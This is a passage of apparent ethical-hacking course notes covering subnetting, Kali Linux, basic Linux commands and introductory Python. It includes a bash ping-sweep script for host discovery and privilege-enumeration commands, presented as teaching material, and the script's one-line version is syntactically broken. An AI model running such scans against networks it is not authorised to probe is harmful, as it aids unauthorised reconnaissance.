address range*. 6 | 7 | *CIDR (Classless Inter-Domain Routing) notation* simplifies representing IP addresses and their subnet masks. It *indicates the network prefix length*, *denoting the number of bits used* for the network part of the IP address. CIDR notation *appends a forward slash (/)* and the prefix length to the IP address. 8 | 9 | **Example:** 10 | - IP Address: 192.168.0.0/24 11 | - *"/24"* means the first *24 bits* are for the network, and the remaining *8 bits* are for hosts. 12 | - Subnet mask: 255.255.255.0. 13 | 14 | To further subnet, you can *borrow additional bits*. If, for example, *2 bits* are borrowed, *4 subnets are created*, and the subnet mask becomes 255.255.255.192 (binary: 11111111.11111111.11111111.11000000). 15 | 16 | **The resulting subnets**: 17 | 1. 192.168.0.0/26 (range: 192.168.0.0 - 192.168.0.63) 18 | 2. 192.168.0.64/26 (range: 192.168.0.64 - 192.168.0.127) 19 | 3. 192.168.0.128/26 (range: 192.168.0.128 - 192.168.0.191) 20 | 4. 192.168.0.192/26 (range: 192.168.0.192 - 192.168.0.255) 21 | 22 | *Each subnet can serve different purposes* within the network. *CIDR notation provides a concise way to define network boundaries*, fostering efficient address allocation in IP networking. 23 | 24 | **Resources:** 25 | Subnet Guide: [Exel-Sheet](https://drive.google.com/file/d/1ETKH31-E7G-7ntEOlWGZcDZWuukmeHFe/view) 26 | ![[Subnetting Part 1 & 2 Exel sheet.png]] 27 | 28 | Seven Second Subnetting: ![](https://www.youtube.com/watch?v=ZxAwQB8TZsM) 29 | 30 | -------------------------------------------------------------------------------- /Practical Ethical Hacking - The Complete Course/04. Introduction to Linux/01. Exploring Kali Linux.md: -------------------------------------------------------------------------------- 1 | # Exploring Kali Linux 2 | > 13.11.2023 3 | --- 4 | 5 | **Kali Linux Overview:** 6 | [Kali Linux](https://www.kali.org) is a *specialized Linux distro* created for *digital forensics, penetration testing, and ethical hacking*. It serves as a powerful operating system widely utilized by *cybersecurity experts, researchers, and enthusiasts*. 7 | 8 | **Purpose:** 9 | - Designed for *digital forensics, penetration testing, and ethical hacking*. 10 | - Used by *cybersecurity professionals* for various security-related tasks. 11 | 12 | **Foundation:** 13 | - *Based on Debian* Linux. 14 | - *Includes* a comprehensive set of *pre-installed tools and software* packages. 15 | 16 | **Objectives:** 17 | - Aims to be an *all-in-one platform for security assessments*, vulnerability analysis, network scanning, password cracking, and more. 18 | - *Provides tools for web application testing*, reverse engineering, exploit development, and secure communication. 19 | 20 | **Security Features:** 21 | - Built with *security* in mind. 22 | - Features *full disk encryption*, *secure shell* access, and regular updates for a secure and up-to-date environment. 23 | 24 | **Responsibility:** 25 | - Users are encouraged to employ Kali Linux responsibly and within legal boundaries. 26 | - Emphasizes ethical hacking and security testing with proper authorization and adherence to laws and regulations. 27 | 28 | **Summary:** 29 | Kali Linux is a Linux distro tailored for cybersecurity tasks, offering a various tools for security testing purposes. Users are urged to use it responsibly and ethically, following legal guidelines for security assessments. -------------------------------------------------------------------------------- /Practical Ethical Hacking - The Complete Course/04. Introduction to Linux/02. Sudo Overview.md: -------------------------------------------------------------------------------- 1 | # Sudo Overview 2 | > 13.11.2023 3 | --- 4 | 5 | **Overview:** 6 | The sudo command in Linux enables a user with appropriate privileges to execute commands as a superuser or another user, commonly used for administrative tasks requiring elevated access. 7 | 8 | **Functionality:** 9 | - Allows execution of commands with elevated privileges. 10 | - Facilitates performing administrative tasks on a Linux system. 11 | 12 | **Example Usage:** 13 | - Example command: ``` 14 | ``` 15 | sudo apt install 16 | ``` 17 | 18 | - For installing "nginx" package: ``` 19 | ``` 20 | sudo apt install nginx 21 | ``` 22 | 23 | **Execution Process:** 24 | - After entering the sudo command, the user is prompted to enter their password. 25 | - Correct password entry grants superuser privileges for executing the specified command. 26 | 27 | **Versatility:** 28 | - Configuration and availability of sudo can vary based on Linux distribution and user privileges. 29 | - Used for diverse administrative tasks like editing system files, managing services, and executing critical commands. 30 | 31 | In summary, the sudo command in Linux empowers users to perform administrative tasks by granting temporary superuser privileges. It is a versatile tool allowing various operations, but its usage may vary depending on the Linux distribution and user permissions. -------------------------------------------------------------------------------- /Practical Ethical Hacking - The Complete Course/04. Introduction to Linux/03. Navigating the File System.md: -------------------------------------------------------------------------------- 1 | # Navigating the File System 2 | > 13.11.2023 3 | --- 4 | 5 | **Linux Commands:** 6 | Useful Linux Commands. 7 | 8 | **pwd (Print Working Directory):** 9 | - *Explanation:* Displays the current working directory. 10 | - *Example:* `pwd` shows the absolute path, e.g., "/home/user/documents". 11 | 12 | **cd (Change Directory):** 13 | - *Explanation:* Allows changing the current working directory. 14 | - *Example:* `cd /home/user/documents` changes to "/home/user/documents". 15 | 16 | **cd .. (Change to Parent Directory):** 17 | - *Explanation:* Moves up one level in the directory hierarchy. 18 | - *Example:* `cd ..` in "/home/user/documents" goes to "/home/user". 19 | 20 | **ls (List Directory Contents):** 21 | - *Explanation:* Lists files and directories in the current directory. 22 | - *Example:* `ls` displays current directory contents. 23 | 24 | **ls -la (List Detailed Directory Contents):** 25 | - *Explanation:* Lists detailed info, including hidden files. 26 | - *Example:* `ls -la` shows detailed list with hidden files. 27 | 28 | **mkdir (Make Directory):** 29 | - *Explanation:* Creates a new directory. 30 | - *Example:* `mkdir new_folder` creates "new_folder". 31 | 32 | **rmdir (Remove Directory):** 33 | - *Explanation:* Removes an empty directory. 34 | - *Example:* `rmdir empty_folder` removes if empty. 35 | 36 | **man (Manual):** 37 | - *Explanation:* Displays manual pages for a command. 38 | - *Example:* `man ls` shows details about the ls command. 39 | 40 | **echo:** 41 | - *Explanation:* Displays text or variables as output. 42 | - *Example:* `echo "Hello, world!"` outputs in the terminal. 43 | 44 | **> (Output Redirection):** 45 | - *Explanation:* Redirects command output to a file (overwrites). 46 | - *Example:* `echo "Hello" > greeting.txt` writes to "greeting.txt". 47 | 48 | **>> (Append Output):** 49 | - *Explanation:* Redirects output, appending to a file. 50 | - *Example:* `echo "World!" >> greeting.txt` appends to "greeting.txt". 51 | 52 | **rm (Remove):** 53 | - *Explanation:* Deletes files or directories. 54 | - *Example:* `rm file.txt` deletes "file.txt". 55 | 56 | **mv (Move):** 57 | - *Explanation:* Moves or renames files and directories. 58 | - *Example:* `mv file.txt new_directory/file_renamed.txt` moves and renames. 59 | 60 | **cp (Copy):** 61 | - *Explanation:* Copies files and directories. 62 | - *Example:* `cp file.txt backup/file_copy.txt` creates a copy. 63 | 64 | **locate:** 65 | - *Explanation:* Searches for files in a prebuilt database. 66 | - *Example:* `locate myfile.txt` finds and displays the path. 67 | 68 | **updatedb:** 69 | - *Explanation:* Updates the locate command's database. 70 | - *Example:* `updatedb` ensures up-to-date search results. 71 | 72 | **passwd:** 73 | - *Explanation:* Allows changing a user's password. 74 | - *Example:* `passwd` prompts for the current and new password. 75 | 76 | **Caution:** Exercise caution, especially with commands like `rm` that can permanently delete files. Double-check before executing such commands. -------------------------------------------------------------------------------- /Practical Ethical Hacking - The Complete Course/04. Introduction to Linux/04. Users and Privileges.md: -------------------------------------------------------------------------------- 1 | # Users and Privileges 2 | > 13.11.2023 3 | --- 4 | 5 | **Linux Permissions and Commands:** 6 | In the `ls -la` output, the *"rwx"* indicates *permissions for the owner*, *group*, and *other users*. Each entity has *read (r)*, *write (w)*, and *execute (x)* permissions, allowing actions like *viewing*, *modifying*, and *executing* files. The format is a *series of nine* characters: *file type, owner, group, and other users' permissions.* 7 | 8 | **For example**: 9 | `-rwxr-x--- 1 user group 4096 May 10 12:34 myfile.txt` 10 | - *File type*: Regular file 11 | - *Owner's permissions*: rwx (read, write, execute) 12 | - *Group's permissions*: r-x (read, execute) 13 | - *Other users' permissions*: --- (no permissions) 14 | - *Additional information*: Hard links (1), owner (user), group (group), file size (4096 bytes), last modification (May 10 12:34), file name (myfile.txt). 15 | 16 | **chmod (Change Mode):** 17 | - *Explanation:* Changes file or directory permissions. 18 | - *Example:* `chmod +x script.sh` adds execute permission to "script.sh." 19 | 20 | **adduser:** 21 | - *Explanation:* Creates a new user account. 22 | - *Example:* `adduser john` creates a user with the username "john." 23 | 24 | **su (Switch User):** 25 | - *Explanation:* Allows switching to another user account. 26 | - *Example:* `su jane` switches to the "jane" account after entering the password. 27 | 28 | **/etc/sudoers:** 29 | - *Explanation:* Displays content from "/etc/sudoers" containing sudo configuration. 30 | - *Example:* `/etc/sudoers` shows sudo access and permissions. 31 | 32 | **sudo -l:** 33 | - *Explanation:* Lists commands a user can run with sudo privileges. 34 | - *Example:* `sudo -l` displays available commands and permissions. 35 | 36 | **Note:** Some commands require *administrative privileges*. Caution is advised when modifying system files or working with user accounts. -------------------------------------------------------------------------------- /Practical Ethical Hacking - The Complete Course/04. Introduction to Linux/05. Common Network Commands.md: -------------------------------------------------------------------------------- 1 | # Common Network Commands 2 | > 12.11.2023 3 | --- 4 | 5 | **ip a:** 6 | - _Explanation:_ Displays network interfaces and associated IP addresses. 7 | - _Example:_ Running `ip a` shows details like IP addresses and MAC addresses for network interfaces. 8 | 9 | **ifconfig:** 10 | - _Explanation:_ Displays configuration and status of network interfaces. 11 | - _Example:_ Running `ifconfig` shows IP addresses, MAC addresses, and more for active network interfaces. 12 | 13 | **iwconfig:** 14 | - _Explanation:_ Displays configuration and status of wireless network interfaces. 15 | - _Example:_ Running `iwconfig` shows details like signal strength and encryption for active wireless interfaces. 16 | 17 | **ip n:** 18 | - _Explanation:_ Displays the Neighbor Table, showing IP-to-MAC address mappings. 19 | - _Example:_ Running `ip n` reveals IP and MAC addresses of recently connected devices. 20 | 21 | **arp -a:** 22 | - _Explanation:_ Displays ARP cache, mapping IP addresses to MAC addresses. 23 | - _Example:_ Running `arp -a` shows IP and MAC addresses recently resolved by ARP. 24 | 25 | **ip r:** 26 | - _Explanation:_ Displays the routing table, containing network route information. 27 | - _Example:_ Running `ip r` shows destination networks, gateway IP addresses, and interfaces. 28 | 29 | **route:** 30 | - _Explanation:_ Displays or manipulates the IP routing table. 31 | - _Example:_ Running `route` shows the routing table, similar to `ip r` command. 32 | 33 | **ping:** 34 | - _Explanation:_ Sends ICMP echo requests to check network connectivity and round-trip time. 35 | - _Example:_ Running `ping 8.8.8.8` sends requests to Google's DNS server, displaying round-trip time and packet loss. 36 | 37 | These commands are essential for network troubleshooting, configuration, and obtaining network-related information in Linux systems. -------------------------------------------------------------------------------- /Practical Ethical Hacking - The Complete Course/04. Introduction to Linux/06. Viewing, Creating, and Editing Files.md: -------------------------------------------------------------------------------- 1 | # Viewing, Creating, and Editing Files 2 | > 13.11.2023 3 | --- 4 | 5 | **echo "hello" > hey.txt:** 6 | - *Explanation:* Creates a new file named "hey.txt" with the content "hello" and overwrites if it exists. 7 | - *Example:* Running `echo "hello" > hey.txt` creates or overwrites "hey.txt" with "hello." 8 | 9 | **echo "hello again" >> hey.txt:** 10 | - *Explanation:* Appends "hello again" to an existing "hey.txt" or creates a new file. 11 | - *Example:* Running `echo "hello again" >> hey.txt` appends to "hey.txt." 12 | 13 | **touch newfile.txt:** 14 | - *Explanation:* Creates a new empty "newfile.txt" or updates timestamp if it exists. 15 | - *Example:* Running `touch newfile.txt` creates or updates "newfile.txt." 16 | 17 | **nano newfile.txt:** 18 | - *Explanation:* Opens Nano text editor to create or edit "newfile.txt." 19 | - *Example:* Running `nano newfile.txt` opens Nano for text input. 20 | 21 | **mousepad newfile.txt:** 22 | - *Explanation:* Opens Mousepad text editor for creating or editing "newfile.txt." 23 | - *Example:* Running `mousepad newfile.txt` opens Mousepad for text input. 24 | 25 | These commands facilitate file *manipulation and editing* in Linux. `echo` prints text or variables, `touch` creates or updates timestamps, and `nano` and `mousepad` are *text editors* for direct file creation or modification from the terminal. -------------------------------------------------------------------------------- /Practical Ethical Hacking - The Complete Course/04. Introduction to Linux/07. Starting and Stopping Services.md: -------------------------------------------------------------------------------- 1 | # Starting and Stopping Services 2 | > 13.11.2023 3 | --- 4 | 5 | **sudo service apache2 start:** 6 | - *Explanation:* Starts the Apache web server service. 7 | - *Example:* Running `sudo service apache2 start` initiates the Apache web server, enabling it to serve web pages. 8 | 9 | **sudo service apache2 stop:** 10 | - *Explanation:* Stops the Apache web server service. 11 | - *Example:* Running `sudo service apache2 stop` halts the running Apache web server, shutting down active web page serving. 12 | 13 | **python3 -m http.server 80:** 14 | - *Explanation:* Starts a simple HTTP server using Python on port 80. 15 | - *Example:* Running `python3 -m http.server 80` starts a basic HTTP server on port 80, allowing file serving from the current directory. 16 | 17 | **sudo systemctl enable ssh:** 18 | - *Explanation:* Enables the SSH (Secure Shell) service to start automatically on system boot. 19 | - *Example:* Running `sudo systemctl enable ssh` configures the system to start the SSH service during system startup. 20 | 21 | **sudo systemctl disable ssh:** 22 | - *Explanation:* Disables the SSH service from starting automatically on system boot. 23 | - *Example:* Running `sudo systemctl disable ssh` prevents the SSH service from starting automatically during system startup. 24 | 25 | These commands are commonly used in *Linux for managing services*, *starting and stopping processes*, and *controlling the automatic startup* of specific services. The `sudo` command grants superuser privileges, and `service` and `systemctl` are used to manage system services. -------------------------------------------------------------------------------- /Practical Ethical Hacking - The Complete Course/04. Introduction to Linux/08. Installing and Updating Tools.md: -------------------------------------------------------------------------------- 1 | # Installing and Updating Tools 2 | > 13.11.2023 3 | --- 4 | 5 | **sudo apt update && sudo apt upgrade:** 6 | - *Explanation:* Updates package lists and upgrades installed packages using the APT package manager on Debian-based Linux systems. 7 | - *Example:* Running `sudo apt update && sudo apt upgrade` updates package lists and upgrades installed packages to their latest versions. 8 | 9 | **sudo apt install cron-daemon-common:** 10 | - *Explanation:* Installs the "cron-daemon-common" package via APT, providing common files and utilities for the cron daemon, a time-based job scheduler. 11 | - *Example:* Running `sudo apt install cron-daemon-common` downloads and installs the "cron-daemon-common" package. 12 | 13 | **git clone https://github.com/Dewalt-arch/pimpmykali.git:** 14 | - *Explanation:* Clones a Git repository from the specified URL using the Git version control system. 15 | - *Example:* Running `git clone https://github.com/Dewalt-arch/pimpmykali.git` clones the repository, creating a local copy with files and version history. 16 | 17 | These commands are *essential in Linux for updating and upgrading packages, installing software, and managing Git repositories*. The `sudo` command grants superuser privileges, `apt` manages packages in Debian-based systems, and `git` handles version control and repository operations. -------------------------------------------------------------------------------- /Practical Ethical Hacking - The Complete Course/04. Introduction to Linux/09. Scripting with Bash.md: -------------------------------------------------------------------------------- 1 | # Scripting with Bash 2 | > 13.11.2023 3 | --- 4 | 5 | **IP Sweeper** 6 | ```bash 7 | #!/bin/bash 8 | if [ "$1" == "" ] then echo "You forgot an IP address!" echo "Syntax: ./ipsweep.sh 192.168.1" else for ip in `seq 1 254`; do ping -c 1 $1.$ip | grep "64 bytes" | cut -d " " -f 4 | tr -d ":" & done fi 9 | ``` 10 | 11 | **Code Analysis:** 12 | ```bash 13 | if [ "$1" == "" ]; then 14 | echo "You forgot an IP address!" 15 | echo "Syntax: ./ipsweep.sh 192.168.1" 16 | else 17 | ``` 18 | 19 | Checks if the script is called without providing an IP address as an argument. If no argument is provided, it prints a usage message and exits. 20 | 21 | ```bash 22 | for ip in `seq 1 254`; do 23 | ping -c 1 $1.$ip | grep "64 bytes" | cut -d " " -f 4 | tr -d ":" & 24 | done 25 | ``` 26 | 27 | - It iterates over a range of IP addresses from 1 to 254. 28 | - For each IP, it uses the `ping` command to send a single ICMP echo request (`-c 1`). 29 | - The output is then filtered using `grep` to extract lines containing "64 bytes." 30 | - `cut` is used to extract the fourth field (the IP address) from the output. 31 | - `tr` is used to delete the trailing colon from the IP address. 32 | - The `&` at the end of the line runs each iteration in the background, allowing for parallel execution. 33 | 34 | -------------------------------------------------------------------------------- /Practical Ethical Hacking - The Complete Course/05. Introduction to Python/01. Introduction.md: -------------------------------------------------------------------------------- 1 | # Introduction 2 | > 13.11.2023 3 | --- 4 | 5 | ## Upcoming Agenda: 6 | 7 | - Strings 8 | - Math 9 | - Variables & Methods 10 | - Function 11 | - Boolean Expressions 12 | - Relational Operators 13 | - Conditional Statements 14 | - Lists 15 | - Tuples 16 | - Looping 17 | - Importing Modules 18 | - Advanced Strings 19 | - Dictionaries 20 | - Sockets 21 | - Tool Building -------------------------------------------------------------------------------- /Practical Ethical Hacking - The Complete Course/05. Introduction to Python/02. Strings.md: -------------------------------------------------------------------------------- 1 | # Strings 2 | > 13.11.2023 3 | --- 4 | 5 | **String Creation:** 6 | ```python 7 | my_string = 'Hello, World!' # or my_string = "Hello, World!" 8 | ``` 9 | 10 | **Accessing Characters:** 11 | - Strings use zero-based indexing. 12 | ```python 13 | print(my_string[0]) # Outputs 'H' 14 | ``` 15 | 16 | **String Concatenation:** 17 | - Joining strings using the `+` operator. 18 | ```python 19 | greeting = 'Hello' + ' ' + 'World!' # Results in 'Hello World!' 20 | ``` 21 | 22 | **String Length:** 23 | - Using the `len()` function. 24 | ```python 25 | print(len(my_string)) # Outputs the length of the string 26 | ``` 27 | 28 | **String Slicing:** 29 | - Extracting substrings using slicing. 30 | ```python 31 | substring = my_string[7:12] # Extracts 'World' 32 | ``` 33 | 34 | **String Methods:** 35 | - Utilizing built-in methods for string manipulation. 36 | ```python 37 | print(my_string.upper()) # Outputs 'HELLO, WORLD!' 38 | ``` 39 | 40 | 7. **String Formatting:** 41 | - Embedding values within a string. 42 | ```python 43 | name = 'Alice' 44 | age = 30 45 | print("My name is %s and I'm %d years old." % (name, age)) 46 | # Output: My name is Alice and I'm 30 years old. 47 | ``` 48 | 49 | **Example:** 50 | ```python 51 | print("Hello, world!") 52 | print('Hello, world!') 53 | print("""This string runs 54 | multiple lines!""") 55 | print("This string is " + "awesome!") # Concatenation 56 | print('\n') # New line 57 | print('Test that new line out.') 58 | ``` 59 | 60 | **Additional Notes:** 61 | - Python supports both single and double quotes for string creation. 62 | - Triple quotes (`'''` or `"""`) allow multiline strings. 63 | - String methods provide powerful ways to manipulate string content. 64 | - String formatting enhances readability and flexibility in creating dynamic strings. 65 | - Escape characters like `\n` represent special characters, like a newline. 66 | - Strings in Python are immutable, ensuring that once created, their content cannot be changed. -------------------------------------------------------------------------------- /Practical Ethical Hacking - The Complete Course/05. Introduction to Python/03. Math.md: -------------------------------------------------------------------------------- 1 | # Math 2 | > 13.11.2023 3 | --- 4 | 5 | In Python, the math module provides a range of mathematical functions and constants. To utilize it, import the math module. 6 | 7 | **Math Functions in the math Module:** 8 | - `math.sqrt(x)`: Calculates the square root of x. 9 | - `math.pow(x, y)`: Raises x to the power of y. 10 | - `math.exp(x)`: Calculates the exponential value of x (e^x). 11 | - `math.log(x)`: Calculates the natural logarithm of x (base e). 12 | - `math.log10(x)`: Calculates the logarithm of x to base 10. 13 | - `math.sin(x)`, `math.cos(x)`, `math.tan(x)`: Calculate the sine, cosine, and tangent of x in radians. 14 | - `math.degrees(x)`: Converts x from radians to degrees. 15 | - `math.radians(x)`: Converts x from degrees to radians. 16 | 17 | **Math Operators:** 18 | - Addition `(+)` 19 | - Subtraction `(-)` 20 | - Multiplication `(*)` 21 | - Division `(/)` 22 | - Integer Division `(//)` : Performs division and returns the quotient as an integer (rounds down). 23 | - Modulo `(%)` : Returns the remainder of division. 24 | - Exponentiation `(**)` : Raises a number to a power. 25 | 26 | **Example:** 27 | ```python 28 | import math 29 | 30 | # Using math functions 31 | print(math.sqrt(25)) # Output: 5.0 32 | print(math.pow(2, 3)) # Output: 8.0 33 | print(math.sin(math.pi/2)) # Output: 1.0 34 | 35 | # Using math operators 36 | x = 10 37 | y = 3 38 | print(x + y) # Output: 13 39 | print(x / y) # Output: 3.3333333333333335 40 | print(x // y) # Output: 3 41 | print(x % y) # Output: 1 42 | print(x ** y) # Output: 1000 43 | 44 | # Additional math operations 45 | print(50 + 50) # add 46 | print(50 - 50) # subtract 47 | print(50 * 50) # multiply 48 | print(50 / 50) # divide 49 | print(50 + 50 - 50 * 50 / 50) # PEMDAS 50 | print(50 ** 2) # exponents 51 | print(50 % 6) # modulo - takes what is left over 52 | print(50 / 6) # division with decimals 53 | print(50 // 6) # no remainder 54 | ``` 55 | -------------------------------------------------------------------------------- /Practical Ethical Hacking - The Complete Course/05. Introduction to Python/04. Variables and Methods.md: -------------------------------------------------------------------------------- 1 | # Variables and Methods 2 | > 13.11.2023 3 | --- 4 | 5 | **Variables:** 6 | A variable is a *named storage location* used to *store data or values* in a program. It acts as a *placeholder for data that can be accessed, modified*, or used in calculations throughout the program. Variables in Python are *dynamically typed*, meaning their data type can change during program execution. Here's an example of variable usage in Python: 7 | 8 | ```python 9 | # Variable assignment 10 | x = 10 11 | name = "John" 12 | is_true = True 13 | 14 | # Variable usage 15 | y = x + 5 16 | print("Hello, " + name) 17 | if is_true: 18 | print("The condition is true") 19 | ``` 20 | 21 | In the example above, `x`, `name`, and `is_true` are variables assigned with different data types (*integer, string, and boolean, respectively*). They are used in calculations and print statements to perform operations and display values. 22 | 23 | **Methods:** 24 | A method is a *block of reusable code* that performs a *specific task or action*. Methods are *associated with objects or classes* and are *called upon to perform certain operations*. In Python, methods are commonly referred to as *functions*. Built-in functions and user-defined functions both fall under the category of methods. Here's an example: 25 | 26 | ```python 27 | # Built-in method example 28 | numbers = [1, 2, 3, 4, 5] 29 | length = len(numbers) 30 | print("Length:", length) 31 | 32 | # User-defined method example 33 | def greet(name): 34 | print("Hello, " + name) 35 | 36 | greet("Alice") 37 | ``` 38 | 39 | In the example above, `len()` is a built-in method that calculates the length of a list (`numbers` in this case). The user-defined method `greet()` takes a parameter `name` and prints a greeting message. It is called with the argument "Alice" to print "Hello, Alice" to the console. 40 | 41 | Methods can have return values, perform actions, accept parameters, and more, depending on their purpose and design. 42 | 43 | **Example Code:** 44 | ```python 45 | #Variables and Methods 46 | quote = "All is fair in love and war." 47 | print(quote) 48 | 49 | print(quote.upper()) # uppercase 50 | print(quote.lower()) # lowercase 51 | print(quote.title()) # title case 52 | print(len(quote)) # counts characters 53 | 54 | name = "Heath" # string 55 | age = 33 # int 56 | gpa = 3.7 # float - has a decimal 57 | 58 | print(int(age)) 59 | print(int(30.1)) 60 | print(int(30.9)) # Will it round? No! 61 | 62 | print("My name is " + name + " and I am " + str(age) + " years old.") 63 | 64 | age += 1 65 | print(age) 66 | 67 | birthday = 1 68 | age += birthday 69 | print(age) 70 | ``` -------------------------------------------------------------------------------- /Practical Ethical Hacking - The Complete Course/05. Introduction to Python/05. Functions.md: -------------------------------------------------------------------------------- 1 | # Functions 2 | > 14.11.2023 3 | --- 4 | 5 | **Function Definition:** 6 | A function is *defined* using the `def` keyword, followed by the *function name, parentheses, and a colon*. The function may also have *parameters (optional)* and a *return statement (optional)* to send back a result. Here's an example of a simple function definition: 7 | 8 | ```python 9 | def greet(): 10 | print("Hello, World!") 11 | ``` 12 | 13 | **Function Call:** 14 | To execute a function, you need to *call it by its name*, followed by parentheses. Here's an example of calling the `greet()` function: 15 | 16 | ```python 17 | greet() 18 | ``` 19 | 20 | **Function Parameters:** 21 | Functions *can accept parameters*, which are variables that hold values passed to the function when it is called. Parameters allow you to *customize the behavior* of a function based on the values you provide. Here's an example of a function with parameters: 22 | 23 | ```python 24 | def greet(name): 25 | print("Hello, " + name + "!") 26 | ``` 27 | 28 | In the example above, the `greet()` function accepts a parameter named `name`. When the function is called with an argument, such as "Alice", *the value is assigned* to the `name` parameter within the function body. 29 | 30 | **Return Statement:** 31 | Functions can also *return values* using the `return` statement. The returned value can be *assigned to a variable* or used directly in expressions. Here's an example: 32 | 33 | ```python 34 | def add_numbers(a, b): 35 | return a + b 36 | 37 | result = add_numbers(3, 4) 38 | print(result) # Output: 7 39 | ``` 40 | 41 | In this example, the `add_numbers()` function takes two parameters (a and b) and *returns their sum*. The returned value is then assigned to the `result` variable and printed. 42 | 43 | Functions provide a way to *encapsulate reusable code* and *improve the structure*of your programs. They can take inputs, perform computations, and produce outputs, allowing you to *modularize your code* and make it more efficient and maintainable. 44 | 45 | **Example:** 46 | ```python 47 | #Functions 48 | print("Here is an example function:") 49 | 50 | def who_am_i(): # this is a function without parameters 51 | name = "Heath" 52 | age = 30 # local variable 53 | print("My name is " + name + " and I am " + str(age) + " years old.") 54 | 55 | who_am_i() 56 | 57 | # adding parameters 58 | def add_one_hundred(num): 59 | print(num + 100) 60 | 61 | add_one_hundred(100) 62 | 63 | # multiple parameters 64 | def add(x, y): 65 | print(x + y) 66 | 67 | add(7, 7) 68 | 69 | def multiply(x, y): 70 | return x * y 71 | 72 | multiply(7, 7) 73 | print(multiply(7, 7)) 74 | 75 | def square_root(x): 76 | print(x ** 0.5) 77 | 78 | square_root(64) 79 | 80 | def nl(): 81 | print('\n') 82 | 83 | nl() 84 | ``` -------------------------------------------------------------------------------- /Practical Ethical Hacking - The Complete Course/05. Introduction to Python/06. Boolean Expressions and Relational Operators.md: -------------------------------------------------------------------------------- 1 | # Boolean Expressions and Relational Operators 2 | > 14.11.2023 3 | --- 4 | 5 | Boolean expressions are expressions that are either *True or False*. They are used in *conditional statements and logical operations* to make decisions based on the *truth or falsity* of certain conditions. Relational operators are used to *compare values and create boolean expressions*. Here's an explanation of boolean expressions and relational operators in Python: 6 | 7 | **Relational Operators:** 8 | Python provides relational operators to compare values: 9 | 10 | - Equality (`==`): Checks if *two values are equal.* 11 | - Inequality (`!=`): Checks if *two values are not equal.* 12 | - Greater than (`>`): Checks if the *left value is greater than the right value.* 13 | - Less than (`<`): Checks if the *left value is less than the right value.* 14 | - Greater than or equal to (`>=`): Checks if the *left value is greater than or equal to the right value.* 15 | - Less than or equal to (`<=`): Checks if the *left value is less than or equal to the right value.* 16 | 17 | **Boolean Expressions:** 18 | Boolean expressions are formed by *combining relational expressions using logical operators.* The logical operators in Python are: 19 | 20 | - Logical *AND* (`and`): Returns True if both operands are True. 21 | - Logical *OR* (`or`): Returns True if at least one operand is True. 22 | - Logical *NOT* (`not`): Negates the value of the operand. 23 | 24 | **Examples:** 25 | ```python 26 | x = 5 27 | y = 10 28 | 29 | # Relational operators 30 | print(x == y) # Output: False 31 | print(x < y) # Output: True 32 | 33 | # Boolean expressions 34 | print(x < y and y > 0) # Output: True 35 | print(x < y or y < 0) # Output: True 36 | print(not (x == y)) # Output: True 37 | ``` 38 | 39 | ```python 40 | # Boolean expressions (True or False) 41 | print("Boolean expressions:") 42 | 43 | bool1 = True 44 | bool2 = 3*3 == 9 45 | bool3 = False 46 | bool4 = 3*3 != 9 47 | 48 | print(bool1, bool2, bool3, bool4) 49 | print(type(bool1)) 50 | 51 | bool5 = "True" 52 | print(type(bool5)) 53 | 54 | nl() 55 | 56 | # Relational and Boolean operators 57 | greater_than = 7 > 5 58 | less_than = 5 < 7 59 | greater_than_equal_to = 7 >= 7 60 | less_than_equal_to = 7 <= 7 61 | 62 | test_and = True and True # True 63 | test_and2 = True and False # False 64 | test_or = True or True # True 65 | test_or2 = True or False # True 66 | 67 | test_not = not True # False 68 | ``` -------------------------------------------------------------------------------- /Practical Ethical Hacking - The Complete Course/05. Introduction to Python/07. Conditional Statements.md: -------------------------------------------------------------------------------- 1 | # Conditional Statements 2 | > 17.11.2023 3 | --- 4 | 5 | **if Statement:** 6 | - Executes a block of code if a condition is true. 7 | 8 | ```python 9 | x = 5 10 | if x > 0: 11 | print("x is positive") 12 | ``` 13 | 14 | **if-else Statement:** 15 | - Chooses between two code blocks based on whether a condition is true or false. 16 | 17 | ```python 18 | x = 5 19 | if x > 0: 20 | print("x is positive") 21 | else: 22 | print("x is not positive") 23 | ``` 24 | 25 | **if-elif-else Statement:** 26 | - Checks multiple conditions and executes corresponding code blocks. 27 | 28 | ```python 29 | x = 5 30 | if x > 0: 31 | print("x is positive") 32 | elif x < 0: 33 | print("x is negative") 34 | else: 35 | print("x is zero") 36 | ``` 37 | 38 | These statements help you make decisions and control program execution based on conditions. Here's an example: 39 | 40 | ```python 41 | #Conditional Statements 42 | def drink(money): 43 | if money >= 2: 44 | return "You've got yourself a drink!" 45 | else: 46 | return "No drink for you!" 47 | 48 | print(drink(3)) 49 | print(drink(1)) 50 | 51 | 52 | def alcohol(age, money): 53 | if(age >= 21) and (money >= 5): 54 | return "We're getting a drink!" 55 | elif (age >= 21) and (money < 5): 56 | return "Come back with more money." 57 | elif (age < 21) and (money >= 5): 58 | return "Nice try, kid!" 59 | else: 60 | return "You're too poor and too young!" 61 | 62 | print(alcohol(21, 5)) 63 | print(alcohol(21, 4)) 64 | print(alcohol(20, 5)) 65 | print(alcohol(20, 4)) 66 | ``` -------------------------------------------------------------------------------- /Practical Ethical Hacking - The Complete Course/05. Introduction to Python/08. Lists.md: -------------------------------------------------------------------------------- 1 | # Lists 2 | > 17.11.2023 3 | --- 4 | 5 | **List Creation:** 6 | - To make a list, put comma-separated values inside square brackets. 7 | 8 | ```python 9 | fruits = ["apple", "banana", "orange"] 10 | ``` 11 | 12 | **List Access:** 13 | - Retrieve individual elements using indexing (starts from 0). 14 | 15 | ```python 16 | print(fruits[0]) # Output: "apple" 17 | print(fruits[2]) # Output: "orange" 18 | ``` 19 | 20 | **List Modification:** 21 | - Lists are mutable; you can change elements by assigning new values or using methods. 22 | 23 | ```python 24 | fruits[1] = "grape" # Modify an element 25 | fruits.append("kiwi") # Add an element to the end 26 | fruits.remove("apple") # Remove an element 27 | ``` 28 | 29 | **List Operations:** 30 | - Perform various operations like concatenation, length retrieval, slicing, and iteration. 31 | 32 | ```python 33 | fruits = ["apple", "banana", "orange"] 34 | fruits2 = ["grape", "kiwi"] 35 | 36 | combined = fruits + fruits2 37 | print(combined) # Output: ["apple", "banana", "orange", "grape", "kiwi"] 38 | 39 | print(len(fruits)) # Output: 3 40 | 41 | sublist = fruits[1:3] 42 | print(sublist) # Output: ["banana", "orange"] 43 | 44 | for fruit in fruits: 45 | print(fruit) # Output: "apple", "banana", "orange" 46 | ``` 47 | 48 | Lists are powerful tools for managing and processing collections of items in Python. Here's an example using movies: 49 | 50 | ```python 51 | #Lists - Have brackets [] 52 | movies = ["When Harry Met Sally", "The Hangover", 